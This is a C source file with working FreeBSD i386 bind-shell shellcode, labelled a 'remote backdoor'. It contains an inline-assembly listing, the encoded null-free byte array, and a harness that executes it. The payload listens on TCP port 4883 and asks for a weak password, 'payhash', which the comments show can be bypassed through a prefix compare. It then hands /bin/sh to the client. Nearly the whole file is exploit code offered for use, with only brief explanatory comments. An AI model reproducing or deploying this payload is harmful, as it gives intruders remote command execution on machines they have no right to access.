/*
THE ZUGCODE - SMALL REMOTE 6ACKD0R
FreeBSD i386 bind shell with auth
code by MahDelin
Big thx SST [kaka, nolife, white]
Binds TCP port 4883 (0x1313) on all interfaces, prompts for a password, and then serves /bin/sh on the accepted connection.
*/
/*
void zugcode(void )
{
//socket
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("pushl %eax");
__asm__("pushl $0x01");
__asm__("pushl $0x02");
__asm__("movl %esp, %ebp");
__asm__("pushl %ebp");
__asm__("movb $0x61, %al");
__asm__("int $0x80");
//struct sockaddr_in
__asm__("movl %eax, %edi");
__asm__("xorl %eax, %eax");
__asm__("movb $0x02, 9(%ebp)");
__asm__("movw $0x1313, 10(%ebp)");
__asm__("movl %eax, 12(%ebp)");
__asm__("leal 8(%ebp), %ecx");
//bind
__asm__("xor %ebx,%ebx");
__asm__("movb $0x10,%bl");
__asm__("push %ebx");
__asm__("push %ecx");
__asm__("push %edi");
__asm__("push %eax");
__asm__("movb $0x68, %al");
__asm__("int $0x80");
//listen
__asm__("xor %eax, %eax");
__asm__("pushl %eax");
__asm__("pushl $0x01");
__asm__("pushl %edi");
__asm__("pushl %eax");
__asm__("movb $0x6a, %al");
__asm__("int $0x80");
//accept
__asm__("xor %eax, %eax");
__asm__("push %ebx");
__asm__("pushl %eax");
__asm__("pushl %eax");
__asm__("pushl %edi");
__asm__("pushl %eax");
__asm__("movb $0x1e, %al");
__asm__("int $0x80");
__asm__("mov %eax, %esi");
__asm__("xor %eax, %eax");
__asm__("pushl $0x203a7465");
__asm__("pushl $0x72636573");
__asm__("movl %esp, %ebx");
__asm__("push %eax");
__asm__("push $0x8");
__asm__("pushl %ebx");
__asm__("push %esi");
__asm__("xor %eax, %eax");
__asm__("push %eax");
__asm__("movb $0x65, %al");
__asm__("int $0x80");
//recv password: reads up to 0x80 bytes starting at %ebp (the frame only reserves 0x20 bytes below %ebp, so the data lands on the saved frame pointer and the stale syscall arguments above it, which the remaining code does not appear to reuse)
__asm__("xor %eax, %eax");
__asm__("pushl %ebp");
__asm__("movl %esp, %ebp");
__asm__("movb $0x20, %al");
__asm__("subl %eax, %esp");
__asm__("xor %eax, %eax");
__asm__("push %eax");
__asm__("mov $0x80, %al");
__asm__("push %eax");
__asm__("xor %eax, %eax");
__asm__("push %ebp");
__asm__("push %esi");
__asm__("push %eax");
__asm__("movb $0x66, %al");
__asm__("int $0x80");
//compare password (jmp/call/pop idiom): .word 0x50eb is a short jmp to the call at the end of the code, which pushes the address of the "payhash\12" string; pop %esi below retrieves it.
//%ecx is the byte count returned by recv(), so repe cmpsb checks only that many bytes: a shorter client message that matches a prefix of the password passes, and a recv() error (-1) leaves %ecx = 0xffffffff. .word 0x4275 is a jne to the exit block below.
//save registers %esi, %edi (in %edx, %ebx) around the string compare
__asm__("mov %edi, %ebx");
__asm__("mov %esi, %edx");
__asm__("mov %eax, %ecx");
__asm__(".word 0x50eb");
__asm__("pop %esi");
__asm__("mov %ebp, %edi");
__asm__("repe cmpsb");
__asm__(".word 0x4275");
__asm__("mov %ebx, %edi");
__asm__("mov %edx, %esi");
//dup2 stdin
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("pushl %esi");
__asm__("pushl %eax");
__asm__("movb $0x5a, %al");
__asm__("int $0x80");
//dup2 stdout
__asm__("xorl %eax, %eax");
__asm__("inc %eax");
__asm__("pushl %eax");
__asm__("pushl %esi");
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("movb $0x5a, %al");
__asm__("int $0x80");
//dup2 stderr
__asm__("xorl %eax, %eax");
__asm__("add $0x2, %eax");
__asm__("pushl %eax");
__asm__("pushl %esi");
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("movb $0x5a, %al");
__asm__("int $0x80");
// /bin/sh
__asm__("xor %ecx, %ecx");
__asm__("pushl %ecx");
__asm__("pushl $0x68732f2f");
__asm__("pushl $0x6e69622f");
__asm__("movl %esp, %ebx");
__asm__("pushl %ecx");
__asm__("pushl %ebx");
__asm__("movl %esp, %edx");
__asm__("pushl %ecx");
__asm__("pushl %edx");
__asm__("pushl %ebx");
__asm__("pushl %ecx");
__asm__("movb $0x3b, %al");
__asm__("int $0x80");
//exit
__asm__("xorl %eax, %eax");
__asm__("inc %eax");
__asm__("pushl %eax");
__asm__("pushl %eax");
__asm__("int $0x80");
__asm__(".byte 0xe8");
__asm__(".long 0xffffffab");
__asm__(".asciz \"payhash\\12\"");   // octal \12 = 0x0a, the newline byte that ends zug[] below
}
*/
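/*
 * FreeBSD/i386 bind-shell payload, 222 bytes, no 0x00 bytes (so strlen()
 * reports the full length and it survives string-copy delivery).
 * It matches the commented listing above:
 *   socket(2, 1, 0); bind() to INADDR_ANY, port 0x1313 (4883); listen();
 *   accept(); send the 8-byte prompt "secret: "; recv() up to 0x80 bytes;
 *   repe cmpsb against the trailing bytes "payhash\n" for as many bytes as
 *   recv() returned; dup2() the client socket onto fds 0, 1 and 2;
 *   execve("/bin//sh"); exit(1) on a mismatch or after execve fails.
 *
 * Security note: the password check is a prefix compare bounded by the
 * recv() length, so a short client message matching the first byte(s)
 * already passes, and a recv() error (-1) turns the count into 0xffffffff.
 * Treat the "auth" as a speed bump, not access control.
 */
unsigned char zug[] =
"\x31\xc0\x50\x50\x6a\x01\x6a\x02\x89\xe5\x55\xb0\x61\xcd\x80\x89\xc7\x31"
"\xc0\xc6\x45\x09\x02\x66\xc7\x45\x0a\x13\x13\x89\x45\x0c\x8d\x4d\x08\x31"
"\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80\x31\xc0\x50\x6a\x01\x57\x50"
"\xb0\x6a\xcd\x80\x31\xc0\x53\x50\x50\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31"
"\xc0\x68\x65\x74\x3a\x20\x68\x73\x65\x63\x72\x89\xe3\x50\x6a\x08\x53\x56"
"\x31\xc0\x50\xb0\x65\xcd\x80\x31\xc0\x55\x89\xe5\xb0\x20\x29\xc4\x31\xc0"
"\x50\xb0\x80\x50\x31\xc0\x55\x56\x50\xb0\x66\xcd\x80\x89\xfb\x89\xf2\x89"
"\xc1\xeb\x50\x5e\x89\xef\xf3\xa6\x75\x42\x89\xdf\x89\xd6\x31\xc0\x50\x56"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x40\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31"
"\xc0\x83\xc0\x02\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31\xc9\x51\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe2\x51\x52\x53\x51"
"\xb0\x3b\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80\xe8\xab\xff\xff\xff\x70\x61"
"\x79\x68\x61\x73\x68\x0a";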
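#include <stdio.h>
#include <string.h>

/*
 * Test harness: print the payload length and jump straight into zug[].
 *
 * strlen() is used deliberately — the payload must contain no 0x00 byte,
 * so a value smaller than sizeof(zug) - 1 means a NUL crept in.
 *
 * NOTE(review): zug[] lives in a writable data section. On platforms that
 * enforce W^X / NX this jump faults before the shellcode runs; the page
 * would need to be made executable first (e.g. mprotect()), which this
 * harness does not do.
 */
int main(void)
{
    int (*zugcode)(void);

    printf("shellcode len, %zu bytes\n", strlen((const char *)zug));

    /* Object-to-function pointer cast: not strictly conforming, but it is
     * the conventional way to run a raw byte array. */
    zugcode = (int (*)(void)) zug;
    (void) zugcode();

    return 0;
}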